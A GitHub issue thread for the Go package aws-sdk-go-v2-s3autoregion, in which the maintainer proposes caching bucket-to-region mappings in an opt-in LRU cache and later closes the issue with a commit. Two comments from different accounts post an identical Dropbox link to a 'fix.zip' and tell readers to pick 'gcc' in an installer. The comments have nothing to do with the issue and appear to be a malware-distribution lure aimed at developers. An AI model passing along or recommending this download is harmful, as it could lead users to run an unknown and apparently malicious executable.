### ISSUE TITLE
Cache bucket name to region mapping

### ISSUE THREAD

**Issue by stefansundin** [stefansundin/aws-sdk-go-v2-s3autoregion#1]
Right now this package doesn't remember which region that buckets reside in. This is fine if your program only works with a single bucket during its execution.

If your program works with many buckets in different regions then an obvious improvement would be to cache the bucket `name -> region` mappings, and have each method apply the correct region before performing the request.

One potential issue may be when the same client is used in multiple go routines, since the region cannot easily be applied on a per-request basis. I think an `optFn` can solve this problem though. If this works well then I don't know if we even need to modify the region of the client at all, since that's using reflection and is kinda hacky.

I think this feature should be opt-in and the maximum size of the cache should be configurable, and it should be an LRU cache.

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by stefansundin** [comment]
Fixed by ab8a14d9499ca787a2edc6c46ea2b4d18f9c10ed.
